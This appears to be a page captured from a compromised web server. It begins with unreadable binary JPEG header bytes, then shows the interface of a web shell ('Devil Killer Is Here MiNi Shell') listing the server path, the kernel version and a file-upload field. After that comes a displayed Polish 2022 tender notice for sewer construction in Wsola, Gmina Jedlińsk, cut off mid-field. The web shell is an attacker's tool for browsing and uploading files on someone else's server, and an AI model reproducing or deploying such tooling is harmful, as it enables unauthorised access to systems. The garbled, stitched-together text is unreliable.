JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220323/0009596801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa kanalizacji sanitarnej w części miejscowości Wsola Gmina Jedlińsk w ramach II etapu w ramach zadania inwestycyjnego: Budowa kanalizacji Wsola-Wielogóra II Etap </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA JEDLIŃSK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670223764</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Warecka 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jedlińsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-660</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 32 13 021</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@jedlinsk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.jedlinsk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa kanalizacji sanitarnej w części miejscowości Wsola Gmina Jedlińsk w ramach II etapu w ramach zadania inwestycyjnego: Budowa kanalizacji Wsola-Wielogóra II Etap </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-58c303d8-aa9f-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00095968</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00028136/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa kanalizacji sanitarnej w części miejscowości Wsola Gmina Jedlińsk w ramach II etapu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://jedlinsk.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w niniejszym postępowaniu, w tym, wymiana informacji oraz<br/>przekazywanie dokumentów<br/>lub oświadczeń między zamawiającym a wykonawcą, odbywa się w języku polskim, przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy znajdującej się pod adresem<br/>https://jedlinsk.ezamawiajacy.pl/ lub poczty elektronicznej przetargi@jedlinsk.pl (z tym zastrzeżeniem że adres e-mail nie dotyczy<br/>składania oferty. Oferta pod rygorem nieważności musi zostać złożona za pośrednictwem platformy zakupowej zamawiającego</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">wymagania techniczne i organizacyjne<br/>wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu opisane zostały w Regulaminie korzystania z<br/>platformy zakupowej zamawiającego Market planet pod adresem https://oneplace.marketplanet.pl/regulamin</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L119<br/>z04.05.2016, str. 1), informuję, że: administratorem Pani/Pana danych osobowych jest : Wójt Gminy Jedlińsk, ul. Warecka 19, 26-<br/>660 Jedlińsk, tel/fax: 48 3213021, e-mail: jedlinsk@jedlinsk.pl/nazwa i<br/>adres oraz dane kontaktowe zamawiającego/; z inspektorem ochrony danych osobowych w Gminie Jedlińsk, kontaktować można się<br/>pod adresem e-mail: inspektor@cbi24.pl.Pani/Pana dane osobowe<br/>przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>prowadzonym w trybie podstawowym na podstawie art. 275 ust 1 pzp; Pani/Pana dane osobowe przetwarzane będą w celu<br/>przeprowadzenia postępowania o udzielenie zamówienia publicznego, zgodnie z wymaganiami określonymi w ustawie z dnia 11<br/>września 2019 r. Pzp (Dz. U. z 2021r. poz. 1129), a następnie zawarcia umowy z wybranym wykonawcą, jej realizacji oraz<br/>rozliczenia,; podstawą przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. b) i c) ogólnego rozporządzenia o ochronie<br/>danych z dnia 27 kwietnia 2016 r., tj.<br/>przetwarzanie jest niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na<br/>żądanie osoby, której dane dotyczą, przed zawarciem umowy oraz przetwarzanie jest niezbędne do wypełnienia obowiązku<br/>prawnego ciążącego na administratorze, wynikającego z ustawy z dnia 11 września 2019 r. Pzp; odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74<br/>ustawy z dnia 11 września 2019r. – pzp; posiada Pan/i prawo do:• żądania dostępu do<br/>treści swoich danych osobowych, ich sprostowania lub ograniczenia przetwarzania,• wniesienia skargi do organu nadzorczego -<br/>Prezesa Urzędu Ochrony Danych Osobowych; nie przysługuje Pani/u• w<br/>związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;• prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20RODO;• na podstawie art. 21 RODO prawo<br/>sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6<br/>ust. 1 lit. c RODO. Pan/i dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu; Pan/i a dane<br/>osobowe będą<br/>przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat liczonych od dnia zakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli czas trwania umowy przekracza 4lata,okres przechowywania obejmuje cały czas trwania umowy informujemy<br/>iż:− w przypadku gdy wykonanie<br/>obowiązków, o których mowa w art. 15 ust. 1–3 rozporządzenia 2016/679,wymagałoby niewspółmiernie dużego wysiłku,<br/>zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego lub konkursu. − skorzystanie przez osobę, której dane dotyczą, z<br/>uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozp. 2016/679, nie może skutkować<br/>zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą. − wystąpienie z żądaniem,<br/>o którym mowa w art. 18 ust. 1 rozp. 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania<br/>o udzielenie zamówienia publicznego lub konkursu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.05.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia publicznego obejmuje <br/>Budowę kanalizacji sanitarnej w części miejscowości Wsola Gmina Jedlińsk w ramach II etapu w ramach zadania inwestycyjnego: Budowa kanalizacji Wsola-Wielogóra II Etap<br/>zadanie dofinasowane ze środków Rządowego Funduszu Polski Ład- Program Inwestycji Strategicznych <br/><br/><br/>Określenie przedmiotu zamówienia publicznego (Opis): <br/><br/>LOKALIZACJA KANALIZACJI– ETAP II<br/>ulica : ul. Leśna odcinek : węzły : PL3 - PL3.22; PL3 - L3.31.1<br/>ulica : ul. Kalinowa odcinek : węzły: L3.31.1 - Ka12; Ka1 - Ka1.51.<br/>ulica : ul. Krótka odcinek : węzły: Ka5 -Kr8<br/>ulica : ul. Bursztynowa odcinek : węzły: B1 - W1<br/>ulica : ul. Wrzosowa odcinek : węzły: W1 - W27<br/>ulica : ul. Gombrowicza odcinek : węzły: B6 - G11<br/>ulica : ul. Szkolna odcinek : węzły: G9 - Szk12<br/>ulica : ul. Pałacowa odcinek : węzły: B9 - Pa26<br/>ulica : ul. Sportowa odcinek : węzły: Pa9 - Sr8<br/>ulica : ul. Słoneczna odcinek : węzły: Pa12 - Sł7<br/>ulica : ul. Warszawska odcinek : węzły: G11 - Wg7; Szk10 - Wsz35; Wsz28 - Wsz28.10; Wsz16 - Wsz16.7; Wsz7 - Wsz7.1; Wsz2 - Wsz2.1.<br/>WSOLA - ETAP II - zakres: zlewnia pompowni PL3<br/>Odcinki sieci<br/>PL3 - L3.22 dł. L = 411,27 m<br/>L3.1 - Ka12 dł. L = 492,75 m<br/>Ka1 - Ka1.5 dł. L = 153 m<br/>Ka5 - Kr8 dł. L = 124,70 m<br/>L3.3 - W27 dł. L = 1009,05 m<br/>B6 -Wg7 dł. L = 548,80 m<br/>G9 - Szk12 dł. L = 288,46 m<br/>Szk10 - Wsz35 dł. L = 787,13 m<br/>Wsz2 - Wsz2.2 dł. L = 49,13 m<br/>Wsz7 - Wsz7.1 dł. L = 60,70 m<br/>Wsz16 - Wsz16.7 dł. L = 191,92 m<br/>Wsz16.1 - Wsz16.13 dł. L = 60,57 m<br/>Wsz28 - Wsz28.1 dł. L = 423,38 m<br/>B9 - Pa26 dł. L = 982,42 m<br/>Pa9 - Sr8 dł. L = 130,09 m<br/>Pa12 - Sk7 dł. L = 108,53 m<br/>P3 - CL3.19 dł. L = 444,73 m<br/>Dla Etapu II projektowana sieć kanalizacyjna posiada następujące parametry:<br/>- całkowita długość sieci grawitacyjnej L = 5850 mb<br/>- całkowita długość przyłączy L = 333 mb<br/>- długość kanału PVC-U 160 SN8 L=333 mb<br/>- długość kanału PVC-U 200 SN8 L=5318 mb<br/>- długość kanału PE100RC SDR17 d=225mm L=532 mb<br/>Zaprojektowano kanał ciśnieniowy o następujących parametrach:<br/>- całkowita długość rurociągów tłocznych L = 445 mb<br/>- długość rurociągu PE100 SDR17 PN10 d=110mm L=445 mb.<br/>Przy zmianach kierunków rurociągów tłocznych zaprojektowano łuki PE100 SDR17 zgrzewane doczołowo.<br/>Włączenia przyłączy zaprojektowano ze studni rewizyjnych Dn600, Dn1000 oraz Dn1200.<br/>Po trasie projektowanej kanalizacji zaprojektowano studnie Dn1200, Dn1000 mm z betonu wibroprasowanego w kl. C40/50 oraz studnie z tworzyw sztucznych Dn625 mm, Dn600 mm, Dn425 mm.<br/>Studnie Dn1200, Dn1000mm projektuje się z elementów prefabrykowanych o połączeniach na uszczelkę gumową. Do studni zaprojektowano włazy kanałowe żeliwne Dn600 mm, o klasie D400, w drogach i nawierzchniach o zmiennym obciążeniu kołowym, oraz o klasie B125 w terenach zielonych.<br/>Kielichy podłączeniowe dostosowane do rur PE, gładkościennych PVC oraz rur dwuściennych. Zwieńczenia studzienek w klasie B125 i D400 teleskopowe o konstrukcji &#34;pływającej&#34; – powiązane z konstrukcją drogi, nieprzenoszące obciążeń na trzon studzienki i jej podłączenia.<br/>Studnie Dn425, Dn600, Dn625 projektuje się, jako kinetę z PP prefabrykowaną, monolityczną wykonaną metodą wtrysku z rurą trzonową karbowaną z PP/PE o średnicy 425 mm ze zwieńczeniem teleskopowym z włazem żeliwnym o klasie B125, a w drogach i nawierzchniach<br/>o zmiennym obciążeniu kołowym o klasie D400 z pierścieniem odciążającym.<br/>Studzienki zbiorcze oprócz przelotu mogą posiadać dopływ prawy i/lub lewy doprowadzone pod kątem 45st. lub 90st.<br/>Studzienki z tworzywa sztucznego posiadają ożebrowane zewnętrzne ściany, co zabezpiecza je przed wyporem wody w gruntach o wysokim poziomie wody gruntowej.<br/>Zaprojektowano:<br/>- 155 studni Dn1200 mm z betonu C40/50;<br/>- 12 studni Dn1000 mm z betonu C40/50;<br/>- 0 studnia inspekcyjna PP/PE Dn600 mm;<br/>- 17 studni PP/PE Dn425 mm;<br/>- 1 studnie rozprężne Dn625.<br/>W celu ograniczenia ilości studni na sieci oraz w miejscach, gdzie ze względu na gęstość uzbrojenia podziemnego nie ma możliwości lokalizacji studni zaprojektowano trójniki.<br/>Zaprojektowano:<br/>- 68 trójników PVC200/160 mm;<br/>- 3 trójniki PE225/160 mm:<br/>- 1 trójnik PE110/110 mm.<br/>Uzbrojeniem przewodów tłocznych będą zawory płuczące, zabudowane bezpośrednio w ziemi. Zawór płuczący połączony z siecią za pomocą trójnika redukcyjnego żeliwnego Dn100/80 lub trójnika Dn80. Zawór płuczący Dn80 zabudować w ziemi, przykryć skrzynką żeliwną uliczną.<br/>Zaprojektowano 6 zestawów do płukania na kanale tłocznym.<br/>Po trasie projektowanej kanalizacji zaprojektowano 1 pompownie ścieków.<br/>Lokalizacja pompowni sieciowych:<br/>- Pompownia PL3 (ul. Leśna) - dz. nr ewid. 174/2 obręb 0036 Wsola - zbiornik typu nieprzejezdnego Dn1500;<br/>Zaprojektowano pompownie jako zbiorniki betonowe o klasie wytrzymałości C40/50<br/>Teren pod pompownię zlokalizowaną poza drogą należy wygrodzić i utwardzić kostką betonową. Natomiast urządzenia towarzyszące pompowni w pasie drogowym umieścić w poboczu, przy najbliższej posesji.<br/>W zakres zadania wchodzi wykonanie 4 szt. instalacji zalicznikowych do projektowanych pompowni ścieków.<br/>Nadzór nad pracą przepompowni zapewniony będzie poprzez system monitoringu i starowania pracujący w trybie on-line z wykorzystaniem transmisji GSM-GPRS.<br/>Zasilanie rezerwowe pompowni przewidziano z użyciem agregatu prądotwórczego przewoźnego.<br/>Rodzaj, usytuowanie oraz średnicę rur przedstawiono na planie zagospodarowania terenu oraz na profilach podłużnych.<br/>Pod dnem Strugi Wolskiej rurociągi kanalizacji sanitarnej zaprojektowano jako rury osłonowe PE RC dwuwarstwowe o średnicy ⌀180 mm i średnicy ⌀250 mm.<br/>Rury osłonowe będą miały długość taką, aby były wyprowadzone poza obrys skarp cieku w odległościach po min. 2,5 m od skarpy brzegowej, a rura przewodowa kanalizacji grawitacyjnej zaprojektowana również z materiału PE-RC.<br/>Rurociągi w miejscach, gdzie niemożliwe jest wykonanie wykopu otwartego wykonany zostanie metodą przecisku/przewiertu z zastosowaniem rur ochronnych stalowych łączonych odcinkami poprzez spawanie lub z zastosowaniem rur trójwarstwowych PE-RC.<br/>Przewierty na kanalizacji grawitacyjnej:<br/>- rura przewiertowa stalowa o śr. 273x4.0 mm L = 262,4mb;<br/>- rura przewiertowa stalowa o śr. 219.1x3.6 mm L = 180 mb.<br/>Przewierty na kanalizacji ciśnieniowej:<br/>- rura przewiertowa stalowa o śr. 146.1x5.0 mm L = 13 mb;<br/>Zestawienie przecisków/przewiertów wykonanych bezwykopowo z wykorzystaniem rur PE - RC:<br/>- PE100-RC SDR17 PN10 DN250 L = 14 mb; - PE100-RC SDR17 PN10 DN225 L = 532 mb. rura przewodowa - PE100-RC SDR17 PN10 DN180 L = 13 mb;<br/>Zastosowanie technologii przewiertów/przecisków pozwala uniknąć naruszenia konstrukcji dróg, parkingów i zjazdów oraz ograniczenia ruchu.<br/>Wszystkie przyłącza przechodzące w poprzek drogi powiatowej wykonane zostaną w całości metodą bezwykopową do granic działek prywatnych. <br/><br/>Przed odbiorem częściowym lub końcowym, na żądanie inspektora nadzoru inwestorskiego Wykonawca zobowiązany będzie przedłożyć kamerowanie wykonanych odcinków kanalizacji sanitarnej wskazanych przez inspektora.<br/><br/>szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa (zał. nr 9 do SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31120000-3 - Generatory</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <p class="mb-0">45232423-3 - Roboty budowlane w zakresie przepompowni ścieków</p> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Kryterium	Znaczenie<br/>1.	C – cena brutto oferty	60%<br/>2.	G - długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia 40%<br/>Razem	100%<br/><br/>Łączna ocena punktowa (S) obliczona zostanie wg wzoru:<br/>S = C + G<br/><br/>1) Ofertę, która uzyska najwyższą ilość punktów Zamawiający uzna za najkorzystniejszą . <br/>2) Oferty oceniane będą punktowo.<br/><br/>3) Kryterium „cena C” - 60% będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę na Formularzu Oferty. <br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/> C = (Cmin / Cb) x 60 pkt<br/> gdzie: C min – najniższa cena brutto z ocenianych ofert<br/> Cb – cena brutto oferty badanej <br/> C – liczba punktów za kryterium ceny<br/>gdzie 1 pkt = 1 %<br/><br/> 4) W kryterium tym można uzyskać maksymalnie 60 punktów<br/>Kryterium „Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia” liczone w latach:<br/><br/><br/>W przypadku zaoferowania minimalnej długości okresu gwarancji tj. 5 lat, Wykonawca otrzyma zero (0) punktów. <br/>W przypadku zaoferowania długości gwarancji 6 lat Wykonawca otrzyma 20 punktów<br/>W przypadku zaoferowania długości gwarancji 7 lat Wykonawca otrzyma 40 punktów<br/><br/>Zamawiający określa minimalną oraz maksymalną długość okresu gwarancji, <br/>w przedziale od 5 lat do 7 lat. W przypadku zaoferowania przez Wykonawcę długości okresu gwarancji krótszego niż 5 lat, Zamawiający ofertę odrzuci jako niezgodną z SWZ. W przypadku, gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego okresu gwarancji Zamawiający przyjmie, że Wykonawca oferuje najkrótszy z proponowanych okresów gwarancji- wówczas przyznane zostanie w tym kryterium 0 pkt. <br/>Wykonawcy oferują długości okresu gwarancji w pełnych latach (w przedziale od 5 do 7 lat).<br/>W przypadku zaoferowania innego niż wskazane w SWZ okresu – oferta zostanie odrzucona jako niezgodna z SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu 